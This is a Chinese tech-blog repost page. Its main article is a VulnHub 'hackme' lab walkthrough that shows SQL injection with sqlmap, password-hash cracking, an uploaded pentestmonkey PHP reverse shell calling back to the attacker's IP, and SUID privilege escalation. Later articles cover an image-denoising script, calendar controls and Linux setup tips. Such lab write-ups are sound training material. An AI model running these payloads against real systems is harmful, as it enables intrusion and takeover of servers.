前端技术
HTML
CSS
Javascript
前端框架和UI库
VUE
ReactJS
AngularJS
JQuery
NodeJS
JSON
Element-UI
Bootstrap
Material UI
服务端和客户端
Java
Python
PHP
Golang
Scala
Kotlin
Groovy
Ruby
Lua
.net
c#
c++
后端WEB和工程框架
SpringBoot
SpringCloud
Struts2
MyBatis
Hibernate
Tornado
Beego
Go-Spring
Go Gin
Go Iris
Dubbo
HessianRPC
Maven
Gradle
数据库
MySQL
Oracle
Mongo
中间件与web容器
Redis
MemCache
Etcd
Cassandra
Kafka
RabbitMQ
RocketMQ
ActiveMQ
Nacos
Consul
Tomcat
Nginx
Netty
大数据技术
Hive
Impala
ClickHouse
DorisDB
Greenplum
PostgreSQL
HBase
Kylin
Hadoop
Apache Pig
ZooKeeper
SeaTunnel
Sqoop
Datax
Flink
Spark
Mahout
数据搜索与日志
ElasticSearch
Apache Lucene
Apache Solr
Kibana
Logstash
数据可视化与OLAP
Apache Atlas
Superset
Saiku
Tesseract
系统与容器
Linux
Shell
Docker
Kubernetes
[NET技术]的搜索结果
这里是文章列表。热门标签的颜色随机变换,标签颜色没有特殊含义。
点击某个标签可搜索标签相关的文章。
点击某个标签可搜索标签相关的文章。
转载文章
...blog.csdn.net/Perpetual_Blue/article/details/124200651。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。 靶机描述 靶机地址:https://www.vulnhub.com/entry/hackme-1,330/ Description ‘hackme’ is a beginner difficulty level box. The goal is to gain limited privilege access via web vulnerabilities and subsequently privilege escalate as root. The lab was created to mimic real life environment. ‘hackme’ uses DHCP and in the possible event that the mysqld shuts down on its own (very rare cases), attempt to force restart the machine and it should be working fine subsequently. This works better with VirtualBox rather than VMware 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.128 靶机: IP地址:192.168.184.149 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 二、实战 2.1网络扫描 2.1.1 启动靶机和Kali后进行扫描 方法一、arp-scan -I eth0 -l (指定网卡扫) arp-scan -I eth0 -l 方法二、masscan 扫描的网段 -p 扫描端口号 masscan 192.168.184.0/24 -p 80,22 方法三、netdiscover -i 网卡-r 网段 netdiscover -i eth0 -r 192.168.184.0/24 方法四、等你们补充 2.1.2 查看靶机开放的端口 使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口 可以发现有 2 个端口开放,22 和 80 2.1.3 尝试访问靶机网页 2.2枚举漏洞 22 端口分析 一般只能暴力破解,暂时没有合适的字典 80 端口分析 访问网站, 发现是一个登陆页面 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Nm2jCq05-1650016495541)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110170424128.png)] 成功登录后 尝试手工注入:x' or 1=1 成功返回所有信息,说明存在SQL注入 2.3漏洞利用 2.3.1 sqlmap 利用注入漏洞 使用 burp 抓查询数据包 POST /welcome.php HTTP/1.1Host: 192.168.184.149Content-Length: 23Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://192.168.184.149Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://192.168.184.149/welcome.phpAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=jub1jihglt85brngo5imqsifb3Connection: closesearch=x 将数据包保存为文件 hackme1.txt 使用 sqlmap 跑一下测试漏洞并获取数据库名: 🚀 python sqlmap.py -r hackme1.txt --dbs --batch [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DjhXfuV9-1650016495544)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110171527015.png)] 数据库除了基础数据库有webapphacking 接下来咱们获取一下表名 🚀 python sqlmap.py -r hackme1.txt --batch -D webapphacking --tables [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1mzxiwhu-1650016495544)(C:\Users\zhang\AppData\Roaming\Typora\typora-user-images\image-20220110172336353.png)] 可以得到两个表books和users 咱们先获取一下users表的信息 🚀 python sqlmap.py -r hackme1.txt --batch -D webapphacking -T users --dump --batch 可以看到有一个superadmin,超级管理员,看起来像一个md5 扩展 在线解密md5网站 国内MD5解密: http://t007.cn/ https://cmd5.la/ https://cmd5.com/ https://pmd5.com/ http://ttmd5.com/ https://md5.navisec.it/ http://md5.tellyou.top/ https://www.somd5.com/ http://www.chamd5.org/ 国外MD5解密: https://www.md5tr.com/ http://md5.my-addr.com/ https://md5.gromweb.com/ https://www.md5decrypt.org/ https://md5decrypt.net/en/ https://md5hashing.net/hash/md5/ https://hashes.com/en/decrypt/hash https://www.whatsmyip.org/hash-lookup/ https://www.md5online.org/md5-decrypt.html https://md5-passwort.de/md5-passwort-suchen 解出来密码是:Uncrackable 登录上去,发现有上传功能 2.3.2 文件上传漏洞 getshell 将 kali 自带的 php-reverse-shell.php 复制一份到 查看文件内容,并修改IP地址 <?php// php-reverse-shell - A Reverse Shell implementation in PHP// Copyright (C) 2007 pentestmonkey@pentestmonkey.net//// This tool may be used for legal purposes only. Users take full responsibility// for any actions performed using this tool. The author accepts no liability// for damage caused by this tool. If these terms are not acceptable to you, then// do not use this tool.//// In all other respects the GPL version 2 applies://// This program is free software; you can redistribute it and/or modify// it under the terms of the GNU General Public License version 2 as// published by the Free Software Foundation.//// This program is distributed in the hope that it will be useful,// but WITHOUT ANY WARRANTY; without even the implied warranty of// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the// GNU General Public License for more details.//// You should have received a copy of the GNU General Public License along// with this program; if not, write to the Free Software Foundation, Inc.,// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.//// This tool may be used for legal purposes only. Users take full responsibility// for any actions performed using this tool. If these terms are not acceptable to// you, then do not use this tool.//// You are encouraged to send comments, improvements or suggestions to// me at pentestmonkey@pentestmonkey.net//// Description// -----------// This script will make an outbound TCP connection to a hardcoded IP and port.// The recipient will be given a shell running as the current user (apache normally).//// Limitations// -----------// proc_open and stream_set_blocking require PHP version 4.3+, or 5+// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.//// Usage// -----// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.set_time_limit (0);$VERSION = "1.0";$ip = '192.168.184.128'; // CHANGE THIS$port = 6666; // CHANGE THIS$chunk_size = 1400;$write_a = null;$error_a = null;$shell = 'uname -a; w; id; /bin/sh -i';$daemon = 0;$debug = 0;//// Daemonise ourself if possible to avoid zombies later//// pcntl_fork is hardly ever available, but will allow us to daemonise// our php process and avoid zombies. Worth a try...if (function_exists('pcntl_fork')) {// Fork and have the parent process exit$pid = pcntl_fork();if ($pid == -1) {printit("ERROR: Can't fork");exit(1);}if ($pid) {exit(0); // Parent exits}// Make the current process a session leader// Will only succeed if we forkedif (posix_setsid() == -1) {printit("Error: Can't setsid()");exit(1);}$daemon = 1;} else {printit("WARNING: Failed to daemonise. This is quite common and not fatal.");}// Change to a safe directorychdir("/");// Remove any umask we inheritedumask(0);//// Do the reverse shell...//// Open reverse connection$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {printit("$errstr ($errno)");exit(1);}// Spawn shell process$descriptorspec = array(0 => array("pipe", "r"), // stdin is a pipe that the child will read from1 => array("pipe", "w"), // stdout is a pipe that the child will write to2 => array("pipe", "w") // stderr is a pipe that the child will write to);$process = proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {printit("ERROR: Can't spawn shell");exit(1);}// Set everything to non-blocking// Reason: Occsionally reads will block, even though stream_select tells us they won'tstream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);printit("Successfully opened reverse shell to $ip:$port");while (1) {// Check for end of TCP connectionif (feof($sock)) {printit("ERROR: Shell connection terminated");break;}// Check for end of STDOUTif (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;}// Wait until a command is end down $sock, or some// command output is available on STDOUT or STDERR$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);// If we can read from the TCP socket, send// data to process's STDINif (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ");$input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input");fwrite($pipes[0], $input);}// If we can read from the process's STDOUT// send data down tcp connectionif (in_array($pipes[1], $read_a)) {if ($debug) printit("STDOUT READ");$input = fread($pipes[1], $chunk_size);if ($debug) printit("STDOUT: $input");fwrite($sock, $input);}// If we can read from the process's STDERR// send data down tcp connectionif (in_array($pipes[2], $read_a)) {if ($debug) printit("STDERR READ");$input = fread($pipes[2], $chunk_size);if ($debug) printit("STDERR: $input");fwrite($sock, $input);} }fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);// Like print, but does nothing if we've daemonised ourself// (I can't figure out how to redirect STDOUT like a proper daemon)function printit ($string) {if (!$daemon) {print "$string\n";} }?> [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RhgS5l2a-1650016495549)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110173559344.png)] 上传该文件 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CKEldpll-1650016495549)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110173801442.png)] 在 kali 监听:nc -lvp 6666 访问后门文件:http://192.168.184.149/php-reverse-shell.php 不成功 尝试加上传文件夹:http://192.168.184.149/uploads/php-reverse-shell.php 成功访问 使用 python 切换为 bash:python3 -c 'import pty; pty.spawn("/bin/bash")' 2.4权限提升 2.4.1 SUID 提权 sudo -l不顶用了,换个方法 查询 suid 权限程序: find / -perm -u=s -type f 2>/dev/null www-data@hackme:/$ find / -perm -u=s -type f 2>/dev/nullfind / -perm -u=s -type f 2>/dev/null/snap/core20/1270/usr/bin/chfn/snap/core20/1270/usr/bin/chsh/snap/core20/1270/usr/bin/gpasswd/snap/core20/1270/usr/bin/mount/snap/core20/1270/usr/bin/newgrp/snap/core20/1270/usr/bin/passwd/snap/core20/1270/usr/bin/su/snap/core20/1270/usr/bin/sudo/snap/core20/1270/usr/bin/umount/snap/core20/1270/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core20/1270/usr/lib/openssh/ssh-keysign/snap/core/6531/bin/mount/snap/core/6531/bin/ping/snap/core/6531/bin/ping6/snap/core/6531/bin/su/snap/core/6531/bin/umount/snap/core/6531/usr/bin/chfn/snap/core/6531/usr/bin/chsh/snap/core/6531/usr/bin/gpasswd/snap/core/6531/usr/bin/newgrp/snap/core/6531/usr/bin/passwd/snap/core/6531/usr/bin/sudo/snap/core/6531/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/6531/usr/lib/openssh/ssh-keysign/snap/core/6531/usr/lib/snapd/snap-confine/snap/core/6531/usr/sbin/pppd/snap/core/5662/bin/mount/snap/core/5662/bin/ping/snap/core/5662/bin/ping6/snap/core/5662/bin/su/snap/core/5662/bin/umount/snap/core/5662/usr/bin/chfn/snap/core/5662/usr/bin/chsh/snap/core/5662/usr/bin/gpasswd/snap/core/5662/usr/bin/newgrp/snap/core/5662/usr/bin/passwd/snap/core/5662/usr/bin/sudo/snap/core/5662/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/5662/usr/lib/openssh/ssh-keysign/snap/core/5662/usr/lib/snapd/snap-confine/snap/core/5662/usr/sbin/pppd/snap/core/11993/bin/mount/snap/core/11993/bin/ping/snap/core/11993/bin/ping6/snap/core/11993/bin/su/snap/core/11993/bin/umount/snap/core/11993/usr/bin/chfn/snap/core/11993/usr/bin/chsh/snap/core/11993/usr/bin/gpasswd/snap/core/11993/usr/bin/newgrp/snap/core/11993/usr/bin/passwd/snap/core/11993/usr/bin/sudo/snap/core/11993/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/11993/usr/lib/openssh/ssh-keysign/snap/core/11993/usr/lib/snapd/snap-confine/snap/core/11993/usr/sbin/pppd/usr/lib/eject/dmcrypt-get-device/usr/lib/openssh/ssh-keysign/usr/lib/snapd/snap-confine/usr/lib/policykit-1/polkit-agent-helper-1/usr/lib/dbus-1.0/dbus-daemon-launch-helper/usr/bin/pkexec/usr/bin/traceroute6.iputils/usr/bin/passwd/usr/bin/chsh/usr/bin/chfn/usr/bin/gpasswd/usr/bin/at/usr/bin/newgrp/usr/bin/sudo/home/legacy/touchmenot/bin/mount/bin/umount/bin/ping/bin/ntfs-3g/bin/su/bin/fusermount 发现一个可疑文件/home/legacy/touchmenot 在 https://gtfobins.github.io/网站上查询:touchmenot 没找到 尝试运行程序:发现直接提权成功 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qcpXI6zZ-1650016495551)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110174530827.png)] 找半天没找到flag的文件 what?就这? 总结 本节使用的工具和漏洞比较基础,涉及 SQL 注入漏洞和文件上传漏洞 sql 注入工具:sqlmap 抓包工具:burpsuite Webshell 后门:kali 内置后门 Suid 提权:touchmenot 提权 本篇文章为转载内容。原文链接:https://blog.csdn.net/Perpetual_Blue/article/details/124200651。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-01-02 12:50:54
497
转载
转载文章
在.NET开发中,网页日历控件作为用户界面交互的重要组成部分,其易用性、兼容性和功能性一直是开发者关注的重点。梅花雪Web Calendar ver 3.0是一个较早且颇受欢迎的日历插件,然而随着技术的不断进步,如今已有更多现代化和功能丰富的日历组件可供选择。例如,jQuery UI Datepicker是一个广泛应用于现代Web项目中的日期选择器,不仅提供了灵活的主题定制,还支持多语言及多种日期格式设置。 对于.NET Core或ASP.NET MVC等新一代框架下的开发者,可考虑采用Bootstrap DateTimePicker或者Microsoft自家的Blazor组件库中的内置日期时间选择器,这些都已实现与现代前端框架深度集成,提供更好的用户体验和更强大的API支持。 此外,在处理日期和时间数据时,遵循W3C推荐的语义化HTML5规范也显得尤为重要,比如使用标签,这样不仅能提高无障碍访问性,还能利用现代浏览器原生的日期选择器功能,减少JavaScript依赖,提升性能表现。 综上所述,尽管梅花雪Web Calendar曾是经典的选择,但在今天的技术背景下,我们鼓励开发者持续关注并采用最新的日历控件技术,以满足不断提升的用户需求和体验标准。同时,在设计和开发过程中,应注重结合实际业务场景,合理运用各种日历组件的优势,以达到最佳实践效果。
2023-04-22 09:54:29
484
转载
转载文章
...blog.csdn.net/qq_42948594/article/details/124712116。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。 前言 Neighbor2Neighbor属于自监督去噪中算法,通过训练后可以对任意尺寸的图像进行去噪,现在对去噪代码中如何实现任意尺寸图像去噪进行解读。 代码 先贴源码 import torchfrom PIL import Imagefrom torchvision import transformsfrom arch_unet import UNetimport numpy as npdef get_generator():global operation_seed_counter 全局变量 在局部变量可以引用全局变量并修改operation_seed_counter += 1g_cuda_generator = torch.Generator(device="cuda")g_cuda_generator.manual_seed(operation_seed_counter)return g_cuda_generatorclass AugmentNoise(object): 添加噪声的类def __init__(self, style):print(style)if style.startswith('gauss'):self.params = [float(p) / 255.0 for p in style.replace('gauss', '').split('_')]if len(self.params) == 1:self.style = "gauss_fix"elif len(self.params) == 2:self.style = "gauss_range"elif style.startswith('poisson'):self.params = [float(p) for p in style.replace('poisson', '').split('_')]if len(self.params) == 1:self.style = "poisson_fix"elif len(self.params) == 2:self.style = "poisson_range"def add_train_noise(self, x):shape = x.shapeif self.style == "gauss_fix":std = self.params[0]std = std torch.ones((shape[0], 1, 1, 1), device=x.device)noise = torch.cuda.FloatTensor(shape, device=x.device)torch.normal(mean=0.0,std=std,generator=get_generator(),out=noise)return x + noiseelif self.style == "gauss_range":min_std, max_std = self.paramsstd = torch.rand(size=(shape[0], 1, 1, 1),device=x.device) (max_std - min_std) + min_stdnoise = torch.cuda.FloatTensor(shape, device=x.device)torch.normal(mean=0, std=std, generator=get_generator(), out=noise)return x + noiseelif self.style == "poisson_fix":lam = self.params[0]lam = lam torch.ones((shape[0], 1, 1, 1), device=x.device)noised = torch.poisson(lam x, generator=get_generator()) / lamreturn noisedelif self.style == "poisson_range":min_lam, max_lam = self.paramslam = torch.rand(size=(shape[0], 1, 1, 1),device=x.device) (max_lam - min_lam) + min_lamnoised = torch.poisson(lam x, generator=get_generator()) / lamreturn noiseddef add_valid_noise(self, x):shape = x.shapeif self.style == "gauss_fix":std = self.params[0]return np.array(x + np.random.normal(size=shape) std,dtype=np.float32)elif self.style == "gauss_range":min_std, max_std = self.paramsstd = np.random.uniform(low=min_std, high=max_std, size=(1, 1, 1))return np.array(x + np.random.normal(size=shape) std,dtype=np.float32)elif self.style == "poisson_fix":lam = self.params[0]return np.array(np.random.poisson(lam x) / lam, dtype=np.float32)elif self.style == "poisson_range":min_lam, max_lam = self.paramslam = np.random.uniform(low=min_lam, high=max_lam, size=(1, 1, 1))return np.array(np.random.poisson(lam x) / lam, dtype=np.float32)model_path = 'test_dir/unet_gauss25_b4e100r02/2022-03-02-22-24/epoch_model_040.pth' 导入训练的模型文件device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')net = UNet().to(device)net.load_state_dict(torch.load(model_path, map_location=device))net.eval()noise_adder = AugmentNoise(style='gauss25')img = Image.open('validation/Kodak/000014.jpg')im = np.array(img, dtype=np.float32) / 255.0origin255 = im.copy()origin255 = origin255.astype(np.uint8)noisy_im = noise_adder.add_valid_noise(im)H = noisy_im.shape[0]W = noisy_im.shape[1]val_size = (max(H, W) + 31) // 32 32noisy_im = np.pad(noisy_im,[[0, val_size - H], [0, val_size - W], [0, 0]],'reflect')transformer = transforms.Compose([transforms.ToTensor()])noisy_im = transformer(noisy_im)noisy_im = torch.unsqueeze(noisy_im, 0)noisy_im = noisy_im.cuda()with torch.no_grad():prediction = net(noisy_im)prediction = prediction[:, :, :H, :W]prediction = prediction.permute(0, 2, 3, 1)prediction = prediction.cpu().data.clamp(0, 1).numpy()prediction = prediction.squeeze()pred255 = np.clip(prediction 255.0 + 0.5, 0, 255).astype(np.uint8)Image.fromarray(pred255).convert('RGB').save('test1.png') 输入图像 尺寸大小为(408, 310),PIL读入后进行归一化处理。 img = Image.open('validation/Kodak/00001.jpg')print('img', img.size) img (408, 310)im = np.array(img, dtype=np.float32) / 255.0print('im', im.shape) im (310, 408, 3) 先对不规则图像进行填充,要求填充的尺寸是32的倍数,否则输入到网络中会报错。在训练的时候是随机裁剪256256的切片的。 b = torch.rand(1, 3, 255, 255).to('cuda')a = net(b)print(a.shape) 在卷积神经网络中,为了避免因为卷积运算导致输出图像缩小和图像边缘信息丢失,常常采用图像边缘填充技术,即在图像四周边缘填充0,使得卷积运算后图像大小不会缩小,同时也不会丢失边缘和角落的信息。在Python的numpy库中,常常采用numpy.pad()进行填充操作。 val_size = (max(H, W) + 31) // 32 32noisy_im = np.pad(noisy_im,[[0, val_size - H], [0, val_size - W], [0, 0]],'reflect') ‘reflect’, 表示对称填充。 上图转自 http://t.zoukankan.com/shuaishuaidefeizhu-p-14179038.html >>> a = [1, 2, 3, 4, 5]>>> np.pad(a, (2, 3), 'reflect')array([3, 2, 1, 2, 3, 4, 5, 4, 3, 2]) 个人感觉使用reflect操作,而不是之间的填充0是为了在边缘去噪的时候更平滑一些。镜像填充后的图如下: 输入网络后,得到预测结果。最后进行裁剪,得到去噪后的图像。 prediction = prediction[:, :, :H, :W] 本篇文章为转载内容。原文链接:https://blog.csdn.net/qq_42948594/article/details/124712116。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-06-13 14:44:26
128
转载
转载文章
...blog.csdn.net/gudulyn/article/details/764890。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。 六、如何设置声卡 不用我说,这可是十分要紧的工作!不过如果你安装了RED HAT Linux,则这项工作就简单了! 用root登录系统,运行/usr/sbin/sndconfig。出现选择声卡类型的画面。一般声卡可以选取Sound Blaster 。 选完声卡后再设置有关的资源。用TAB键结合方向键作出选择后,按OK,如果听到Linus(Linux的创始人)说话的声音,就说明声卡设置成功了。真像老式DOS游戏的声卡设置…… 七、如何设置显卡 要设置好你的显卡,首先,要知道你的显卡的型号,是什么公司出的,什么样的类型的显卡,显存有几MB,还要知道显卡的显示芯片是什么类型的,是 ALG2302的,还是SIS6326的,还是Savage3D的,等;然后,在超级用户的权限下,你可以运行界面比较友好的Xconfigurator 工具,这里的X记住一定要大写的,一步一步跟着指导来选择,应该不是很难的,当选择你的显卡的芯片的时钟时,不用选择它,让测试程序自动检查;最后,还要知道你的显示器的类型,是VGA的,还是SVGA的,以及水平和垂直分辩率。你还可以运行界面不友好的xfree86,如果你比较精通Linux的话,用 xfree86命令配置的X Windows效果比Xconfigurator好很多的。界面最友好的,当属XF86Setup工具,若你有安装这个工具的话,不妨就用这个工具来设置你的显卡吧。 八、如何设置网卡 九、如何播放CD音乐 声卡设置好了,可以在光驱中插入一张CD,用装载命令mount将光盘载入,然后输入cdp命令就可以播放了。在屏幕上可以看到CD的音轨清单,小键盘的9是播放,7是停止,6进到下一音轨,4退到前一音轨,0退出播放程序,2弹出CD,8是暂停。 如果是在X-Window中,可以用xplaycd播放CD,这是一个有图形界面的播放器,按钮及功能一目了然,这里就不多说了。 10、如何播放VCD影碟 11、如何拨号上网 12、Linux下能玩游戏吗 光盘中有bsd-games-2.1-3.src.rpm文件包,用RPM命令进行安装,然后到安装目录中去找游戏吧。不过这些游戏都不够精致,如果你想玩好的,就须要进入X-Window,acm是空战模拟游戏,paradise和xpilot是联网战斗游戏,xdemineur是挖地雷(没想到吧),xjewel是俄罗斯方块,xboard是国际象棋,xpat2是扑克牌游戏,xboing是弹珠台游戏,还有Doom——大名鼎鼎的第一人称射击游戏!这些游戏有的可以直接调出,有的须要用RPM命令安装。所有的RPM包都在安装光盘中的srpms目录下,自己去看看吧。 十.用xvidtune调整你的显示器 大家会发现装了linux之后在windows下用的好好的显示器有时进到linux的xwindows里后就歪掉了,调整好之后回到windows后windows的桌面也外调了,来回启动系统每次都要调整很麻烦的,这里介绍一个办法一劳永逸 j进入linux启动x在xterm里执行xvidtune,会弹出这个软件的窗口,点Auto然后点Left,Right等按钮调整你的显示器到最佳的位置,然后点界面上的Show按钮会得到类似这样的输出: "1152x864" 121.50 1152 1232 1360 1568 864 865 868 911 +hsync -vsync 然后退出这个软件,修改你的/etc/X11/XF86Config-4文件在 Section "Monitor" Identifier "AS 786T" VendorName "Unknown" ModelName "Unknown" HorizSync 30 - 87 VertRefresh 50 - 160 Option "dpms" EndSection 里加上刚才的输出,我的是: Section "Monitor" Identifier "AS 786T" VendorName "Unknown" ModelName "Unknown" HorizSync 30 - 87 VertRefresh 50 - 160 Modeline "1152x864" 121.50 1152 1232 1360 1568 864 865 868 911 +hsync -vsync Option "dpms" EndSection 保存然后重起试试看吧 十一.问:我的机器是windows和linux双系统,如何改变grub默认启动的系统? 答:这需要修改/boot/grub/grub.conf。举一个例子你就明白了。假设你的/boot/grub/grub.conf是这样子的: default=0 timeout=10 splashimage=(hd0,7)/grub/splash.xpm.gz title Red Hat Linux (2.4.18-14) root (hd0,7) kernel /vmlinuz-2.4.18-14 ro root=LABEL=/ initrd /initrd-2.4.18-14.img title DOS rootnoverify (hd0,0) chainloader +1 那么你的grub会默认启动Red Hat Linux (2.4.18-14)这个系统,把default=0改成default=1,那么grub会默认启动DOS这个系统。注意,这里的要点是:你想默认启动第n个title所指的系统,那么default应该是等于n-1 十二.问:我的文本控制台怎么总是出现乱码呢? 答:这是因为你安装了中文支持的缘故。解决的方法是安装一个zhcon(一个快速地外挂式CJK(中文/日文/韩文)的多内码平台),我把他放在附件中提供大家下载。关于zhcon的更进一步的消息,大家可以到他的官方主页zhcon.gnuchina.org查看。安装和使用请参考这个连接 http://hepg.sdu.edu.cn/Service/tips/zhcon_manual.html zhcon下载连接: http://zhcon.gnuchina.org/download/...on-0.2.1.tar.gz 十三.问:我在安装一个软件的时候,提示我缺少一个.so文件,安装无法继续,怎么办? 答:.so文件就像windows中的.dll文件一样,是库文件。一个程序的正常安装和运行需要特定的库文件的支持。所以你需要去找到包含这个.so的包装上。去 http://www.rpmfind.net用你缺的那个.....剿枰?rpm包 十四.我访问windows分区时发现所有windows分区中的文件和文件夹名中的中文全变成问号,怎么办? 答:在第三贴中我们讲解了通过编辑/etc/fstab实现在linux中访问windows的fat32分区。同样,我们可以通过进一步修改 /etc/fstab来实现中文文件名显示。只要把/dev/hda1 /mnt/c vfat default 0 0中的default全改为iocharset=cp936就行了。 十五.我的rh8.0中的XMMS不好使,不能播放MP3,怎么办? 答:这是因为rh公司怕别人告他侵权,所以在rh8.0中去掉了XMMS对MP3的支持,8.0以前的版本都是好使的。在8.0中要解决也很简单,装一个插件就行了。这个插件我放在本贴的附件里,rpm格式,经winrar压缩 附件: http://www.chinalinuxpub.com/vbbfor...s=&postid=86299 十六.问:我在linux中怎样才能使用windows分区呢? 答:先说一点背景知识。linux支持很多种文件系统,包括windows的fat32和ntfs。对fat32的支持已经很好,可以直接使用,而对ntfs 的支持还不是太好,只能读,而写是极危险的,并且对ntfs的支持不是默认的,也就是说你想要使用ntfs的话,需要重新编译内核。鉴于重编内核对于新手的复杂性,这里只讲解使用fat32分区的方法下面给出上述问题的两种解决方案:1.在安装系统(linux),进行到分区选择挂载点时,你可以建立几个挂载点,如/mnt/c,/mnt/d等,然后选择你的windows fat32分区,把它们分别挂载到前面建立的挂载点即可。(注意,正如前面所说,在这里你不能把一个ntfs分区挂载到一个挂载点,应为ntfs不是默认支持的。)这样你装好系统后就能直接使用你的windows fat32分区了。例如,你把windows的c盘(linux中的/dev/hda1)挂载到/mnt/c,那么你就能在/mnt/c目录中找到你的c 盘中的全部数据。2. 如果你在安装系统时没有像方案1所说的那样挂载上你的fat32分区,没关系,仍然能够很方便的解决这个问题。首先,用一个文本编辑器(如vi)打开 /etc/fstab,在文件的最后加入类似如下的几行 /dev/hda1 /mnt/c vfat default 0 0 你所要做的修改就是,把/dev/hda1改成你要挂载的fat32分区在linux中的设备号,把/mnt/c改成相应的挂载点即可。注意,挂载点就是一个目录,这个目录要事先建立。举一个例子,我有三个fat32分区,在windows中是c,d,e盘,在linux中的设备号分别为 /dev/hda1,/dev/hda5,/dev/hda6。那么我就要先建立3个挂载点,如/mnt/c,/mnt/d,/mnt/e,然后在 /etc/fstab中加上这么几行: /dev/hda1 /mnt/c vfat default 0 0 /dev/hda5 /mnt/d vfat default 0 0 /dev/hda6 /mnt/e vfat default 0 0 保存一下退出编辑器。这样以后你重启机器后就能直接使用c,d,e这三个fat32格式的windows分区了 十七.问:我的机器重装windows后,开机启动就直接进入了windows,原来的linux进不去了,怎么办? 答:这是由于windows的霸道。重装windows后,windows重写了你的mbr,覆盖掉了grub。解决方法很简单:用你的linux第一张安装盘引导进入linx rescue模式(如何进入?你注意一下系统的提示信息就知道了),执行下面两条命令就可以了 chroot /mnt/sysimage 改变你的根目录 grub-install /dev/hda 安装grub到mbr 十八.问:我的linux开机直接进入文本界面,怎样才能让它默认进入图形界面? 答:修改/etc/inittab文件,其中有一行id:3:initdefault,意思是说开机默认进入运行级别3(多用户的文本界面),把它改成id:5:initdefault,既开机默认进入运行级别5(多用户的图形界面)。这样就行了。 十九.如何同时启动多个x 以前的帖子,估计很多人没看过,贴出来温习一下 Linux里的X-Windows以其独特的面貌和强大的功能吸引了很多原先对linux不感兴趣的人,特别是KDE和GNOME,功能强大不说,而且自带了很多很棒的软件,界面非常友好,很适合于初学者。下面告诉大家一个同时启动6个X的小技巧: 在~/.bashrc中加入 以下几行: alias X=startx -- -bpp 32 -quiet& alias X1=startx -- :1 -bpp 32 -quiet& alias X2=startx -- :2 -bpp 32 -quiet& alias X3=startx -- :3 -bpp 32 -quiet& alias X4=startx -- :4 -bpp 32 -quiet& alias X5=startx -- :5 -bpp 32 -quiet& 其中32是显示器的色彩深度,你应该根据自己的实际情况设置。 之后运行 bash 使改变生效,以后只要依次运行X,X1,X2,X3,X4,X5就可以启动6个X-Windows了。 二十.装了rpm的postgresql之后启动 /etc/init.d/postgresql start 是不能启动postgresql的tcp/ip连接支持的,所以打开/etc/init.d/postgresql这个文件把 su -l postgres -s /bin/sh -c "/usr/bin/pg_ctl -D $PGDATA -p 